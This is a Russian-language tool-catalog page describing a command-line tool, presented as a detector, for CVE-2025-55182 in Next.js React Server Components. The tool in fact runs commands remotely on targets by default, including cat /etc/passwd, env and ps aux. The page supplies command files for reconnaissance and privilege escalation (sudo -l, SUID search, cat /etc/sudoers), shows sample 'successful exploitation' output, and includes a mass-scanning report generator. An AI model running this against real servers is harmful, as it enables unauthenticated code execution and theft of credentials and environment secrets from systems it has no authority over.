Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/rix4uni/cve-2025-55182
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components.

Репозиторий
613 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182

Инструмент командной строки для обнаружения CVE-2025-55182 и CVE-2025-66478 в приложениях Next.js, использующих React Server Components.

🚀 Установка

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ Использование

Сканер CVE-2025-55182

Базовый синтаксис

root@kitploit:~
CVE-2025-55182 -d https://example.com

Опции

Примечание: Если параметры команд не указаны, выполняются команды по умолчанию.

Команды по умолчанию

Инструмент по умолчанию выполняет следующие команды:

  1. cat /etc/os-release — информация об ОС
  2. whoami — текущий пользователь
  3. pwd — текущая рабочая директория
  4. id — идентификатор пользователя и группы
  5. uname -a — информация о системе
  6. hostname -I — сетевые интерфейсы
  7. ls -la — список файлов
  8. cat /etc/passwd — учетные записи пользователей
  9. env — переменные окружения
  10. ps aux — запущенные процессы

Генератор отчетов

Инструмент reportgenerator автоматически создает профессиональные отчеты о раскрытии уязвимостей на основе результатов сканирования.

Возможности

  • Параллельное сканирование нескольких целей
  • Автонумерация, которая сохраняет существующие отчеты (без перезаписи)
  • Профессиональные отчеты в Markdown с разделом Security Vulnerability Disclosure
  • Настраиваемое имя исследователя и входной файл

Базовое использование

root@kitploit:~
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Run report generator
reportgenerator

Опции

ФлагОписаниеПо умолчанию
--fileВходной файл, содержащий целевые доменыsubs.txt
--userИмя исследователя для раздела раскрытияBhagirath Saxena

Примеры

root@kitploit:~
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator

# Use custom target file
reportgenerator --file targets.txt

# Use custom researcher name
reportgenerator --user "John Doe"

# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"

Структура вывода

Отчеты создаются в двух директориях:

  • textfile/ — необработанные результаты сканирования (нумерованные: 1.txt, 2.txt, и т.д.)
  • mdfile/ — профессиональные отчеты в Markdown (нумерованные: 1.md, 2.md, и т.д.)

Примечание: Автонумерация гарантирует, что существующие отчеты никогда не будут перезаписаны. Новые сканирования продолжаются с наибольшего существующего номера.

Формат отчета

Каждый созданный отчет включает:

  1. Security Vulnerability Disclosure — профессиональное вступительное письмо
  2. Цель — протестированный домен
  3. Выполненные команды — список команд, запущенных во время тестирования
  4. Сводка уязвимости — детали CVE и оценка воздействия
  5. Детали эксплуатации — вывод команд с состоянием выполнения
  6. Сводка выполнения — таблица, показывающая успех/неудачу каждой команды
  7. Анализ воздействия — оценка серьезности и наблюдения
  8. Рекомендации — шаги по устранению для команды безопасности
  9. Ссылки — ссылки на детали CVE и уведомления по безопасности

🎨 Примеры вывода

Успешная эксплуатация

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

Частичный успех

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 Технические детали

Уязвимость

  • CVE: CVE-2025-55182
  • Тип: Prototype Pollution → RCE
  • Затронутые: приложения Next.js с определенными конфигурациями
  • Вектор: HTTP POST с специально созданным multipart/form-data
  • Воздействие: неаутентифицированное удаленное выполнение кода от имени пользователя приложения

📚 Ссылки

  • Подробности CVE-2025-55182
  • Уведомления о безопасности Next.js

Примеры директории commands/:

Создайте примеры файлов команд для различных сценариев:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
Скачать инструмент
ОпцияОписаниеПо умолчанию
-d, --domainЦелевой URL (автоматически добавляет https://, если протокол не указан)http://localhost:3000
-c, --commandОдна команда для выполнения-
-m, --multipleНесколько команд, разделенных точкой с запятой-
-f, --fileФайл с командами (по одной на строку)-
-h, --helpПоказать справку-